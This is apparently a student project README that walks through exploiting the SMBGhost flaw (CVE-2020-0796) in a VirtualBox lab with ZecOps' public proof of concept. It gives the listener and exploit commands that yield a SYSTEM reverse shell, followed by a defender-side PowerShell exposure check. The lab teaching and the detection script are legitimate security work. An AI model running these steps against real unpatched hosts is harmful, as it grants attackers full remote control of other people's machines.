This project demonstrates a proof-of-concept (PoC) exploit of CVE-2020-0796, also known as SMBGhost - a critical pre-auth RCE vulnerability affecting Windows 10 and Windows Server systems using SMBv3. This was developed as part of a school cybersecurity project. All exploit code credit goes to ZecOps. I have only used and adapted it for educational purposes to demonstrate exploitation of CVE-2020-0796 within a controlled lab environment.
To replicate this demonstration, the following setup is required:
Attacker VM:
- VirtualBox (using NATNetwork for VM networking)
- Windows 10 (any recent version)
- Python 3.x (added to system PATH)
- Netcat (included with Nmap or installed separately)
- Exploit script from the GitHub PoC: `SMBleedingGhost.py` by ZecOps

Target VM:
- VirtualBox (same NATNetwork configuration)
- Windows 10 version 1903, release 19H1, Build 18362.356 (2019.09), Home or Pro Edition (x64)
- Windows Firewall disabled (to allow port 445 access)
- Offset calculation script from the GitHub PoC: `calc_target_offsets.bat` by ZecOps
- Launch Command Prompt on both the Attacker and Target virtual machines.
- Execute `ipconfig` in each machine.
- Take note of the IP addresses of the VMs; you will use them in the later steps.
- On the Target VM, navigate to the `CVE-2020-0796-RCE-POC-master` folder.
- Double-click to run the script: `calc_target_offsets.bat`
- This will generate the memory offsets required for the exploit.
- Keep the window open and take note of the values shown; you will use them in the next step.
- On the Attacker VM, open the same `CVE-2020-0796-RCE-POC-master` folder.
- Right-click `SMBleedingGhost.py` and open it with Notepad.
- In the `SMBleedingGhost.py` file, scroll down and locate the section that begins with `OFFSETS = {`.
- Replace the existing offset values with the ones you obtained from the Target VM.
- Save the file after editing.
- You may now close the offset window on the Target VM.
- Open a new Command Prompt and run: `ncat -lvp 4321`
- This sets up a listener on port `4321` to receive a reverse shell from the Target VM upon successful exploitation.
- You can change the port number if needed.
- Open another Command Prompt and navigate to the PoC directory (I saved mine on the Desktop):

```
cd Desktop
cd CVE-2020-0796-RCE-POC-master
dir
```

- Run the exploit with the appropriate IPs and port:

```
python SMBleedingGhost.py <target_ip> <attacker_ip> <port>
```

Example used in this demo:

```
python SMBleedingGhost.py 192.168.18.61 192.168.18.62 4321
```

- `192.168.18.61`: Target VM IP
- `192.168.18.62`: Attacker VM IP
- `4321`: Port used in the netcat listener
If successful, the netcat window will show:

```
Microsoft Windows [Version 10.0.18362.356]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
```

This confirms that:
- The Target VM has been exploited
- The Attacker VM now has system-level privileges
You can validate access by executing `whoami`. This will give:

```
whoami
nt authority\system
```

This means that the Attacker VM now has system-level privileges on the Target VM.
You can also run `ipconfig` to verify you are interacting with the Target VM's network.
Note: The Target VM may crash after exploitation. If it does, you may restart it. The attacker session will need to be re-established after reboot.
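A check a defender would run on the Target VM before (or instead of) this demo, added here as an example that is not part of the ZecOps PoC or of this repository's files. It reports whether the host is in the state the demo relies on: a Windows 10 1903/1909 build, SMBv3 compression still enabled, and the firewall off so port 445 is reachable. It assumes KB4551762 is the March 2020 fix for CVE-2020-0796 and that `DisableCompression = 1` under `LanmanServer\Parameters` is Microsoft's ADV200005 workaround.

```powershell
# Added defender-side check, not part of the ZecOps PoC or this demo's files.
# Assumptions: KB4551762 is the March 2020 fix for CVE-2020-0796, and
# DisableCompression=1 under LanmanServer\Parameters is the ADV200005 workaround.
function Test-SmbGhostExposure {
    $ver   = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    $build = [int]$ver.CurrentBuild
    $ubr   = [int]$ver.UBR

    # Only the 1903 (18362) and 1909 (18363) code base carries the vulnerable
    # SMBv3 decompression path; the demo's target is 18362.356.
    $affectedBuild = $build -in 18362, 18363

    # ADV200005 workaround: SMB server compression switched off via the registry.
    $smbParams = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters' `
        -ErrorAction SilentlyContinue
    $compressionDisabled = ($smbParams.DisableCompression -eq 1)

    # Security update that fixes the bug (assumed id, see lead-in).
    $fixInstalled = [bool](Get-HotFix -Id KB4551762 -ErrorAction SilentlyContinue)

    # Firewall profiles turned off, as in the demo's target setup (port 445 exposed).
    $firewallOff = @(Get-NetFirewallProfile | Where-Object { -not $_.Enabled } | ForEach-Object Name)

    [pscustomobject]@{
        Build               = "$build.$ubr"
        AffectedBuild       = $affectedBuild
        FixInstalled        = $fixInstalled
        CompressionDisabled = $compressionDisabled
        FirewallOffProfiles = $firewallOff
        Exposed             = ($affectedBuild -and -not $fixInstalled -and -not $compressionDisabled)
    }
}

Test-SmbGhostExposure | Format-List
```

Later cumulative updates supersede KB4551762 and may not list it under that id, so a missing hotfix entry on an otherwise up-to-date host is not by itself proof of exposure; the build number and the compression setting are the more reliable signals.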
This demonstration is based on the publicly available proof-of-concept developed by ZecOps.
This repository is created for educational purposes only.
All tools, scripts, and techniques demonstrated are intended to help understand cybersecurity vulnerabilities in a controlled lab environment. Do not attempt to use any of the provided materials on systems or networks that you do not own or have explicit permission to test.
Any misuse of the software will not be the responsibility of the author.